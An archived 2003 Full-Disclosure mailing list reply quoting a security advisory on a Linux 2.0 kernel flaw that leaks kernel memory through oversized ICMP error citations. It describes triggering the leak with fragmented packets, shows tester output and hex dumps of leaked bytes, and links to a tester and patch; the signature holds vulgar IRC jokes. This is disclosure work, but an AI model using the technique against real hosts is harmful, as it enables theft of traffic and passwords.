lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <3EE4483B.2000309@d2.net.au>
Date: Mon, 09 Jun 2003 18:41:31 +1000
From: Andrew Griffiths <andrewg@...net.au>
To: Philippe Biondi <biondi@...tel-securite.fr>
Cc: vuln-dev@...urityfocus.com, full-disclosure@...ts.netsys.com,
   bugtraq@...urityfocus.com
Subject: Re: Linux 2.0 remote info leak from too big icmp
 citation


http://www.securityfocus.com/archive/1/251418/2002-01-15/2002-01-21/0

Looks like another way of triggering the bug, IMO.

Philippe Biondi wrote:
> ----------------------------------------------------------------------
>                Cartel Sécurité --- Security Advisory
> 
> Advisory Number: CARTSA-20030314
> Subject:         Linux 2.0 remote info leak from too big icmp citation
> Author:		 Philippe Biondi <biondi@...tel-securite.fr>
> Discovered:      March 14, 2003
> Published:       June 9, 2003
> CERT reference:  VU#471084 (http://www.kb.cert.org/vuls/id/471084)
> ----------------------------------------------------------------------
> 
> You can use this URL to link this document :
> http://www.cartel-securite.fr/pbiondi/adv/CARTSA-20030314-icmpleak.txt
> 
> 
> Problem description
> ===================
> 
> There is a bug in the way linux 2.0 kernel IP stack computes the size of an
> ICMP citation for almost every ICMP errors. This leads to too much data being
> sent on the network, coming from anywhere in the memory.
> 
> This is a very important leak. Experiments show that even passwords can
> be stolen. Moreover, you can do this from anywere on the internet, as soon
> as you can send IP packets to the vulnerable host (except special firewalling).
> 
> The typical case is when you use a linux 2.0 box (or, more probably,
> any appliance that uses it) as a masquerading gateway for internet and
> DMZ. In this configuration, the gateway can be used to leak potentially
> all your traffic from your LAN, even your POP passwords for
> the mail server in the DMZ.
> 
> 
> Vulnerable products
> ===================
> 
> Any 2.0 linux kernel before 2.0.39 (2.0.39 included)
> Watchguard Firebox II
> 
> Any appliance (firewall, proxy, etc.) that uses linux 2.0 <= 2.0.39
> 
> 
> A tester can be found here (no guarantee though) :
> http://www.cartel-securite.fr/pbiondi/python/icmpleaktest.py
> 
> Vulnerable:
> # ./icmpleaktest.py  192.168.11.2
> Packet sent. Answer should take 31s. Interrupt with C-c
> Got '\x95\x03\x1a\x10Ji\xfb\xba\xd0\xc5Q\x14\x877\xbd\x8a;\xb3^\x7f'
> 
> Not vulnerable:
> # ./icmpleaktest.py  172.16.1.40
> Packet sent. Answer should take 31s. Interrupt with C-c
> Got ''
> 
> 
> Vendor status
> =============
> 
> Linux 2.0.40 should be out soon.

I was under the impression they would have fixed it earlier. That said, 
I wouldn't be surprised.

> Watchguard said updated releases will follow.
> 
> These vendors said they are not vulnerable :
> * Netscreen
> * Symantec
> * Novell
> * Clavister
> * Ingrian
> * StoneSoft
> * Sun
> 
> 
> Solutions
> =========
> 
> * patch at http://www.cartel-securite.fr/pbiondi/patches/icmpleak.patch
>   (No guarantee)
> * exchange your old appliance by a brand new linux 2.4/netfilter
> 
> 
> Workarounds
> ===========
> 
> No good workarrounds. But you can at least carefully try these :
> * truncate ICMP errors at the RFC limit,
> * filter out icmp errors
> 
> 
> Example
> =======
> 
> We can send an IP packet with the MF flag :
> 
> 15:41:05  192.168.0.12.80 > 192.168.0.10.80:  udp 4 (frag 52007:12@0+)
> 0x0000   4500 0020 cb27 2000 4011 0e3f c0a8 000c        E....'..@.......
> 0x0010   c0a8 000a 0050 0050 000c cd1e 5858 5858        .....P.P....XXXX
> 
> we wait 30s for the reassembly to timeout :
> 
> 15:41:35  192.168.0.10 > 192.168.0.12: icmp: ip reassembly time exceeded [tos 0xc0]
> 0x0000   45c0 0050 dcca 0000 4001 1bbc c0a8 000a        E..P....@.......
> 0x0010   c0a8 000c 0b01 aa24 0000 0000 4500 0020        .......$....E...
> 0x0020   cb27 2000 4011 0e3f c0a8 000c c0a8 000a        .'..@...........
> 0x0030   0050 0050 000c cd1e 5858 5858                  .P.P....XXXX
>                                        0050 0050                    .P.P
> 0x0040   000c cd1e 5858 5858 207b 2d68 0000 0000        ....XXXX.{-h....
> 
> 
> Bytes at offsets 0x3c to 0x4f are bonus.
> It works with every ICMP errors except the port unreachable error.
> It is possible to increase the size of data leaked by adding IP options.
> 
> 
> Examples of bonus bytes :
> 
> 98 EA CD 03 10 58 CD 03 31 32 33 34 AA FF 55 00   .....X..1234..U.
> 98 86 0C 03 98 EC CD 03 10 58 CD 03 00 00 00 00   .........X......
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
> 58 EE CD 03 98 86 0C 03 98 EE CD 03 10 58 CD 03   X............X..
> 69 6E 66 6F 72 6D 61 74 69 6F 6E 00 4D 49 4E 46   information.MINF
> 00 00 00 00 00 00 00 00 AA FF 55 00 90 88 CC 03   ..........U.....
> 00 50 00 50 00 0C CD 1E 58 58 58 58 00 00 00 00   .P.P....XXXX....
> 2E 30 2E 25 75 2E 69 6E 2D 61 64 64 72 2E 61 72   .0.%u.in-addr.ar
> 90 12 CC 03 00 00 00 00 98 C0 B5 02 00 00 00 00   ................
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
> 43 5F 4D 4F 4E 45 54 41 52 59 00 4C 43 5F 43 4F   C_MONETARY.LC_CO
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
> 90 E2 CA 03 00 00 00 00 98 A0 CC 03 00 00 00 00   ................
> 00 50 00 50 00 0C CD 1E 58 58 58 58 00 00 00 00   .P.P....XXXX....
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
> 00 00 00 00 18 5F FF 00 00 00 00 00 14 00 00 00   ....._..........
> 73 69 6E 6C 00 2E 67 6E 75 2E 77 61 72 6E 69 6E   sinl..gnu.warnin
> 70 9E 09 40 60 9E 09 40 E0 9A 08 40 A0 9F 08 40   p..@`..@...@...@
> 68 01 00 00 41 46 00 00 67 01 00 00 41 4C 00 00   h...AF..g...AL..
> FF FF FF FF FF FF FF FF E2 00 00 00 4A 00 00 00   ............J...
> 61 67 65 2D 72 65 74 75 72 6E 00 53 49 00 53 4F   age-return.SI.SO
> 61 73 68 00 7A 65 72 6F 00 6F 6E 65 00 74 77 6F   ash.zero.one.two
> 0D 00 00 00 01 00 00 00 0E 00 00 00 01 00 00 00   ................
> 01 00 00 00 2D 00 00 00 01 00 00 00 2E 00 00 00   ....-...........
> 4C 00 00 00 01 00 00 00 4D 00 00 00 01 00 00 00   L.......M.......
> 01 00 00 00 6C 00 00 00 01 00 00 00 6D 00 00 00   ....l.......m...
> 4C 43 5F 41 4C 4C 00 4C 43 5F 4D 45 53 53 41 47   LC_ALL.LC_MESSAG
> 
> 
> ----------------------------------------------------------------------
> Copyright (c) Cartel Sécurité
> This document is copyrighted. It can't be edited nor republished
> without explicit consent of Cartel Sécurité.
> For more informations, feel free to contact us.
> http://www.cartel-securite.fr/
> ----------------------------------------------------------------------
> 


Sincerely,
Andrew Griffiths

-- 
<Kahless> geez, u climb the highest mountain, netstumble the highest 
mast, but
you suck one cock........
<Clonefish> No thanks
<Kahless> hey, it wasn't an invitation........
<RokLobsta> or you help luigi build his house, guiseppe to get his business
going and you save the town from a meteor, but you fuck one goat....
<Kahless> that's the one
<Clonefish> Mmmmkay.....
<swarm> um
<swarm> next topic plz


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ